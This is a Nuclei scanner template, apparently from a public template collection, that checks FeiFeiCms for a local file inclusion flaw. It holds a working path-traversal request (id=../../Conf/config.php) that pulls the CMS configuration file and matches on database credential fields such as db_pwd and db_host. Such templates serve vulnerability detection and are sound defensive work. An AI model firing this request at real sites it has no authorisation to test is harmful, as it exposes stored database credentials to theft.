nuclei-templates/http/vulnerabilities/other/feifeicms-lfr.yaml

38 lines
819 B
YAML

id: feifeicms-lfr
info:
name: FeiFeiCms - Local File Inclusion
author: princechaddha
severity: high
description: FeiFeiCms is vulnerable to local file inclusion.
reference:
- https://www.cnblogs.com/jinqi520/p/10202615.html
- https://gitee.com/daicuo/feifeicms
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: feifeicms,lfi
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "db_name"
- "db_pwd"
- "db_host"
condition: and
part: body